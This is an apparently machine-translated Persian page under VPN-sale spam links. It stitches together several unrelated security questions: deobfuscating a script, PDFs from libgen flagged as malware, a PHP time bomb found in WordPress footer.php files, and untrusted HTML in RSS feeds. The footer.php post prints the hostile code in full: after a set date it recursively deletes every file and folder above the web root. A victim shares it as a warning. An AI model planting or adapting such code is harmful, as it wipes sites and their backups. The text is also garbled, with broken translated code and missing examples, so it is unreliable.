کلیک کنید: خرید VPN خرید وی پی ان خرید فیلتر شکن خرید فیلترشکن
خرید کریو خرید وی پی ان خرید VPN خرید فیلترشکن
Evening all
من یک اسکریپت مبهم داشتم. از خواسته شد که کد obfuscate را deobfuscate و url را از اسکریپت استخراج کند. با این حال، از ابزارهای دایوفاسکات استفاده شدم مانند
این کار نکرد.
اسکریپت مبهوت شده زیر است:
آیا می توانید به من راهنمایی کنید که چگونه deobfuscate و استخراج url. با تشکر از شما
من 3 فایل PDF مختلف را از libgen دانلود کردم و فایرفاکس به من می گوید که آنها حاوی نرم افزارهای مخرب هستند. چگونه می توانم بیشتر در مورد نوع آسیب پذیری که در آن پیدا کردم بیشتر بدانم؟
اگر فایرفاکس در مورد این آسیب پذیری می داند، آن را به طور گسترده ای شناخته شده است و احتمالا در اکثر سیستم ها اصلاح شده است، درست است؟ من حدس می زنم که احتمالا آن را در فایرفاکس بدون هیچ مشکلی باز کنم.
آسیب پذیری، اگر واقعا وجود دارد، احتمالا برای ویندوز است و من در ubuntu هستم.
با این حال، به نظر می رسد که این ویروس ها به طور خاص در این فایل های PDF نیستند، مگر اینکه همه مواردی که در آن آلوده شده اند، به دلیل اینکه هر چیزی که از آن دانلود می کنم، هشدار دهنده است. آیا ممکن است که فایرفاکس فقط پرچم گذاری شود چرا که آن را به عنوان مخرب در نظر می گیرد؟
چند ماه پیش برخی از وبسایتهای من هک شده بودند. FTP ها ظاهرا خالی بودند، هنگام بارگیری سایت ها، خطای 403 را دریافت کردم. اگر سعی کردم پشتیبان گیری FTP ها را بارگیری کنم و فایل سیستم را بررسی کنم، همه فایل ها وجود داشت. با این حال، زمانی که سعی کردم سایت را باز کنم، 403 دریافت کردم و FTP دوباره خالی بود.
من تمام فایل ها را اسکن کرده ام و یک فایل مخرب در فایل های خود پیدا کردم. کد همیشه در فایل footer.php در پوشه تم وردپرس من و همچنین در footer.php در CMS سفارشی من واقع شده است.
کد اساسا فایل سیستم را اسکن می کند، ریشه را پیدا می کند و سپس در زمان مشخص شده خود را اجرا می کند و تمامی فایل ها را حذف می کند. اگر نسخه پشتیبان تهیه کنید، اگر فردی وب سایت را باز کند، دوباره آن را حذف می کند. این چیزی است که کد به نظر می رسد:
<؟
$ today = تاریخ ("Y-m-d H: i: s")؛
$ date = "2018-05-01 00:00:00"؛
function listFolderFiles ($ dir) {
$ ffs = scandir ($ dir)؛
unset ($ ffs [array_search('.', $ffs, true)])؛
Unset ($ ffs [array_search('..', $ffs, true)])؛
// جلوگیری از عناصر دستورالعمل خالی
اگر (count ($ ffs) <1)
برگشت؛
foreach ($ ffs به عنوان $ ff) {
اگر (! is_dir ($ dir. '/'. $ ff)) unlink ($ dir. '/'. $ ff)؛
اگر (is_dir ($ dir. '/'. $ ff)) listFolderFiles ($ dir. '/'. $ ff)؛
}
}
تابع rmDirs ($ dir) {
$ emptyDir = false؛
$ ffs = scandir ($ dir)؛
unset ($ ffs [array_search('.', $ffs, true)])؛
Unset ($ ffs [array_search('..', $ffs, true)])؛
// جلوگیری از عناصر دستورالعمل خالی
اگر (count ($ ffs) < 1)
return true;
foreach($ffs as $ff) {
if(is_dir($dir.'/'.$ff)) $emptyDir = rmDirs($dir.'/'.$ff);
if($emptyDir) {
if(is_dir($dir.'/'.$ff)) rmdir($dir.'/'.$ff);
rmDirs($dir);
}
}
return false;
}
if ($today > $ date) {
listFolderFiles (dirname ($ _ سرور ['DOCUMENT_ROOT']))؛
rmDirs (dirname ($ _ سرور ['DOCUMENT_ROOT']))؛
}
؟>
دقیقا همین اتفاق برای من افتاد. اولین بار این تاریخ در نیمه شب به 1 فوریه تنظیم شد و اکنون در نیمه شب به 1 ماه مه تنظیم شده است. کد همیشه در فایل حداقل دو هفته قبل از تاریخ مشخص شده قرار می گیرد. میزبانی وب که من استفاده می کنم، هر روز 14 روز پشتیبان گیری FTP های خود را به صورت خودکار انجام می دهم، بنابراین حدس می زنم این نقطه قرار دادن کد در زمان پیش است.
چیزی که من در مورد هر موضوعی پیدا نکردم این کد خاص، هر تکه ای از آن را آنلاین، بنابراین من حدس می زنم ممکن است به صورت سفارشی نوشته شده است – من در یک سازمان دیجیتال کار می کند، بنابراین احتمالا توسط رقبای کسب و کار ما.
من آن را ثابت کرده ام، ما بهترین ها را برای حفظ این اتفاق می افتد دوباره، اما من می خواهم دیگران در مورد این کد بدانند و برای پیدا کردن آن. همچنین، اگر برخی از منابع شناخته شده این، من می خواهم بدانم. با تشکر!
من یک مشتری RSS را اجرا می کنم که در آن کاربران می توانند فید را انتخاب کنند و آنها را در یک مکان نمایش دهد.
متوجه شدم که برخی RSS ها دارای عنصر HTML در HTML هستند. آیا این بدان معنی است که برخی از تغذیه ها ممکن است شامل جاوااسکریپت بالقوه مخرب باشد؟
آیا راهی امن برای ارائه HTML feed وجود دارد؟ یا باید همیشه تصور کنم که این میتواند مخرب باشد؟
مثال:
